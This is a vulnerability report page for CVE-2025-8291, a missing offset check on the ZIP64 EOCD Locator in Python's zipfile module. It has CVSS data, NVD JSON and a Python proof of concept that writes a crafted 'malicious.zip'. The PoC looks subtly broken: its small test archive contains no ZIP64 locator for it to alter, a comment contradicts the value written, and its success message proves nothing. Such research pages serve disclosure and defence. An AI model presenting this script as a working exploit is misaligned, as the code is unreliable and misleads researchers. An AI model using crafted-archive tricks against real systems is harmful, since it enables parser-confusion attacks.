Security Vulnerability Report
中文
CVE-2025-8291 CVSS 4.3 MEDIUM

CVE-2025-8291

Published: 2025-10-07 18:16:00
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The 'zipfile' module would not check the validity of the ZIP64 End of Central Directory (EOCD) Locator record offset value would not be used to locate the ZIP64 EOCD record, instead the ZIP64 EOCD record would be assumed to be the previous record in the ZIP archive. This could be abused to create ZIP archives that are handled differently by the 'zipfile' module compared to other ZIP implementations. Remediation maintains this behavior, but checks that the offset specified in the ZIP64 EOCD Locator record matches the expected value.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Python (CPython) < 修复版本(涉及3.10.x、3.11.x、3.12.x、3.13.x分支)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2025-8291: Python zipfile module ZIP64 EOCD Locator offset validation bypass This PoC creates a malicious ZIP64 archive with an inconsistent ZIP64 EOCD Locator offset. """ import struct import zipfile import io def create_malicious_zip64(): """Create a ZIP64 archive with manipulated EOCD Locator offset.""" buf = io.BytesIO() # Create a normal ZIP file first with zipfile.ZipFile(buf, 'w', zipfile.ZIP_STORED) as zf: zf.writestr('test.txt', 'Hello World') data = bytearray(buf.getvalue()) # Find ZIP64 EOCD Locator signature (0x07064B50) eocd_locator_sig = struct.pack('<I', 0x07064B50) locator_pos = data.find(eocd_locator_sig) if locator_pos != -1: # The offset field is at position +12 from locator signature start # Modify it to an incorrect value # Original offset should point to ZIP64 EOCD, we set it to 0 (invalid) struct.pack_into('<Q', data, locator_pos + 12, 0xDEADBEEF) print(f"[*] Modified ZIP64 EOCD Locator offset at position {locator_pos + 12}") print(f"[*] New offset value: 0xDEADBEEF (invalid)") return bytes(data) def verify_vulnerability(): """Verify the vulnerability by parsing the malicious ZIP.""" malicious_zip = create_malicious_zip64() # Save malicious ZIP to disk with open('malicious.zip', 'wb') as f: f.write(malicious_zip) print("[+] Saved malicious ZIP to malicious.zip") # Try to open with Python's zipfile (vulnerable behavior) try: with zipfile.ZipFile(io.BytesIO(malicious_zip), 'r') as zf: print("[+] Python zipfile opened the malicious ZIP successfully") print("[!] This demonstrates the vulnerability - offset validation missing") for name in zf.namelist(): print(f" - File: {name}") except Exception as e: print(f"[-] Python zipfile failed: {e}") if __name__ == '__main__': print("=" * 60) print("CVE-2025-8291 PoC - ZIP64 EOCD Locator Offset Bypass") print("=" * 60) verify_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8291", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:16:00.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The 'zipfile' module would not check the validity of the ZIP64 End of\nCentral Directory (EOCD) Locator record offset value would not be used to\nlocate the ZIP64 EOCD record, instead the ZIP64 EOCD record would be\nassumed to be the previous record in the ZIP archive. This could be abused\nto create ZIP archives that are handled differently by the 'zipfile' module\ncompared to other ZIP implementations.\n\n\nRemediation maintains this behavior, but checks that the offset specified\nin the ZIP64 EOCD Locator record matches the expected value."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1285"}]}], "references": [{"url": "https://github.com/python/cpython/commit/162997bb70e067668c039700141770687bc8f267", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/1d29afb0d6218aa8fb5e1e4a6133a4778d89bb46", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/333d4a6f4967d3ace91492a39ededbcf3faa76a6", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/76437ac248ad8ca44e9bf697b02b1e2241df2196", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/8392b2f0d35678407d9ce7d95655a5b77de161b4", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/bca11ae7d575d87ed93f5dd6a313be6246e3e388", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/commit/d11e69d6203080e3ec450446bfed0516727b85c3", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/issues/139700", "source": "[email protected]"}, {"url": "https://github.com/python/cpython/pull/139702", "source": "[email protected]"}, {"url": "https://mail.python.org/archives/list/[email protected]/thread/QECOPWMTH4VPPJAXAH2BGTA4XADOP62G/", "source": "[email protected]"}, {"url": "https://github.com/google/security-research/security/advisories/GHSA-hhv7-p4pg-wm6p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://github.com/psf/advisory-database/blob/main/advisories/python/PSF-2025-12.json", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.